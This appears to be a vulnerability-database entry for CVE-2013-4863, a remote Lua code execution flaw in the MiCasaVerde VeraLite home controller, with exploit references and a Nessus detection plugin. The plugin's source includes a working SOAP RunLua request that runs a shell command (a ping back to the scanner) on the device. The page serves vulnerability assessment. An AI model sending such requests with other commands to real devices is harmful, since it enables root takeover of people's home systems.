Vulnerabilities > CVE-2013-4863 - Improper Authentication vulnerability in Micasaverde Veralite Firmware 1.5.408

047910
CVSS 9.0 - CRITICAL
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
SINGLE
Confidentiality impact
COMPLETE
Integrity impact
COMPLETE
Availability impact
COMPLETE
network
low complexity
micasaverde
CWE-287
critical
nessus
exploit available

Summary

The HomeAutomationGateway service in MiCasaVerde VeraLite with firmware 1.5.408 allows (1) remote attackers to execute arbitrary Lua code via a RunLua action in a request to upnp/control/hag on port 49451 or (2) remote authenticated users to execute arbitrary Lua code via a RunLua action in a request to port_49451/upnp/control/hag.

Vulnerable Configurations

Part Description Count
OS
Micasaverde
1
Hardware
Micasaverde
1

Common Weakness Enumeration (CWE)

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Authentication Abuse
    An attacker obtains unauthorized access to an application, service or device either through knowledge of the inherent weaknesses of an authentication mechanism, or by exploiting a flaw in the authentication scheme's implementation. In such an attack an authentication mechanism is functioning but a carefully controlled sequence of events causes the mechanism to grant access to the attacker. This attack may exploit assumptions made by the target's authentication procedures, such as assumptions regarding trust relationships or assumptions regarding the generation of secret values. This attack differs from Authentication Bypass attacks in that Authentication Abuse allows the attacker to be certified as a valid user through illegitimate means, while Authentication Bypass allows the user to access protected material without ever being certified as an authenticated user. This attack does not rely on prior sessions established by successfully authenticating users, as relied upon for the "Exploitation of Session Variables, Resource IDs and other Trusted Credentials" attack patterns.
  • Exploiting Trust in Client (aka Make the Client Invisible)
    An attack of this type exploits a programs' vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by placing themselves in the communication channel between client and server such that communication directly to the server is possible where the server believes it is communicating only with a valid client. There are numerous variations of this type of attack.
  • Utilizing REST's Trust in the System Resource to Register Man in the Middle
    This attack utilizes a REST(REpresentational State Transfer)-style applications' trust in the system resources and environment to place man in the middle once SSL is terminated. Rest applications premise is that they leverage existing infrastructure to deliver web services functionality. An example of this is a Rest application that uses HTTP Get methods and receives a HTTP response with an XML document. These Rest style web services are deployed on existing infrastructure such as Apache and IIS web servers with no SOAP stack required. Unfortunately from a security standpoint, there frequently is no interoperable identity security mechanism deployed, so Rest developers often fall back to SSL to deliver security. In large data centers, SSL is typically terminated at the edge of the network - at the firewall, load balancer, or router. Once the SSL is terminated the HTTP request is in the clear (unless developers have hashed or encrypted the values, but this is rare). The attacker can utilize a sniffer such as Wireshark to snapshot the credentials, such as username and password that are passed in the clear once SSL is terminated. Once the attacker gathers these credentials, they can submit requests to the web service provider just as authorized user do. There is not typically an authentication on the client side, beyond what is passed in the request itself so once this is compromised, then this is generally sufficient to compromise the service's authentication scheme.
  • Man in the Middle Attack
    This type of attack targets the communication between two components (typically client and server). The attacker places himself in the communication channel between the two components. Whenever one component attempts to communicate with the other (data flow, authentication challenges, etc.), the data first goes to the attacker, who has the opportunity to observe or alter it, and it is then passed on to the other component as if it was never intercepted. This interposition is transparent leaving the two compromised components unaware of the potential corruption or leakage of their communications. The potential for Man-in-the-Middle attacks yields an implicit lack of trust in communication or identify between two components.

Exploit-Db

  • descriptionMiCasaVerde VeraLite 1.5.408 - Multiple Vulnerabilities. CVE-2013-4861,CVE-2013-4862,CVE-2013-4863,CVE-2013-4864,CVE-2013-4865. Webapps exploit for hardware ...
    idEDB-ID:27286
    last seen2016-02-03
    modified2013-08-02
    published2013-08-02
    reporterTrustwave's SpiderLabs
    sourcehttps://www.exploit-db.com/download/27286/
    titleMiCasaVerde VeraLite 1.5.408 - Multiple Vulnerabilities
  • descriptionMiCasa VeraLite - Remote Code Execution. CVE-2013-4863,CVE-2016-6255. Remote exploit for Hardware platform
    fileexploits/hardware/remote/40589.html
    idEDB-ID:40589
    last seen2016-10-20
    modified2016-10-20
    platformhardware
    port
    published2016-10-20
    reporterJacob Baines
    sourcehttps://www.exploit-db.com/download/40589/
    titleMiCasa VeraLite - Remote Code Execution
    typeremote

Nessus

NASL familyMisc.
NASL idMICASAVERDE_VERALITE_RUNLUA.NASL
descriptionThe remote MiCasaVerde VeraLite Smart Home Controller is affected by a remote code execution vulnerability. An unauthenticated, remote attacker can exploit this, via the UPnP RunLua action, to execute arbitrary shell commands as root. Note that MiCasaVerde VeraLite is reportedly affected by additional vulnerabilities; however, Nessus has not tested for these.
last seen2020-06-01
modified2020-06-02
plugin id93911
published2016-10-07
reporterThis script is Copyright (C) 2016-2019 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/93911
titleMiCasaVerde VeraLite UPnP RCE
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if(description)
{
  script_id(93911);
  script_version("1.7");
  script_cvs_date("Date: 2019/03/06 18:38:55");

  script_cve_id("CVE-2013-4863");
  script_bugtraq_id(61591);
  script_xref(name:"EDB-ID", value:"27286");

  script_name(english:"MiCasaVerde VeraLite UPnP RCE");
  script_summary(english:"Attempts to execute a command via the UPnP RunLua action.");

  script_set_attribute(attribute:"synopsis", value:
"The remote device is affected by a remote code execution
vulnerability.");
  script_set_attribute(attribute:"description", value:
"The remote MiCasaVerde VeraLite Smart Home Controller is affected by a
remote code execution vulnerability. An unauthenticated, remote
attacker can exploit this, via the UPnP RunLua action, to execute
arbitrary shell commands as root.

Note that MiCasaVerde VeraLite is reportedly affected by additional
vulnerabilities; however, Nessus has not tested for these.");
  script_set_attribute(attribute:"see_also", value:"https://getvera.com/controllers/veralite/");
  script_set_attribute(attribute:"see_also", value:"https://www3.trustwave.com/spiderlabs/advisories/TWSL2013-019.txt");
  script_set_attribute(attribute:"solution", value:
"The vendor has stated that they will not patch the vulnerability.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2013/08/01");
  script_set_attribute(attribute:"plugin_publication_date", value:"2016/10/07");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english: "Misc.");
  script_copyright(english:"This script is Copyright (C) 2016-2019 Tenable Network Security, Inc.");

  script_dependencie("upnp_www_server.nasl");
  script_require_keys("upnp/www");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("string.inc");

appname = 'VeraLite';
port = get_kb_item_or_exit('upnp/www');
location = get_kb_item_or_exit('upnp/'+port+'/location');

if ("luaupnp.xml" >!< location) audit(AUDIT_HOST_NOT, 'affected');

payload = '<?xml version="1.0" encoding="utf-8" standalone="yes"?>' +
  '<s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">' +
  '<s:Body>' +
  '<u:RunLua xmlns:u="urn:schemas-micasaverde-org:service:HomeAutomationGateway:1">' +
  '<Code>os.execute(&quot;ping -c 10 ' + compat::this_host() + '&quot;)</Code>' +
  '</u:RunLua>' +
  '</s:Body>' +
  '</s:Envelope>';

request = 'POST /upnp/control/hag HTTP/1.1\r\n' +
  'Host: ' + get_host_ip() + ':' + string(port) + '\r\n' +
  'Content-Type: text/xml; charset="utf-8"\r\n' +
  'Soapaction: "urn:schemas-micasaverde-org:service:HomeAutomationGateway:1#RunLua"\r\n' +
  'MIME-Version: 1.0\r\n' +
  'Content-Length: ' + len(payload) + '\r\n' +
  '\r\n' +
  payload;

soc = open_sock_tcp(port);
if (!soc) audit(AUDIT_SOCK_FAIL,port, appname);

filter = "icmp and icmp[0] = 8 and src host " + get_host_ip();
response = send_capture(socket:soc, data:request, pcap_filter:filter);
icmp = tolower(hexstr(get_icmp_element(icmp:response, element:"data")));
close(soc);

if(isnull(icmp)) audit(AUDIT_LISTEN_NOT_VULN, appname, port);

report = '\nNessus was able to execute a command on the remote device.\n';
security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);
exit(0);

Packetstorm

Seebug

bulletinFamilyexploit
descriptionNo description provided by source.
idSSV:80900
last seen2017-11-19
modified2014-07-01
published2014-07-01
reporterRoot
sourcehttps://www.seebug.org/vuldb/ssvid-80900
titleMiCasaVerde VeraLite 1.5.408 - Multiple Vulnerabilities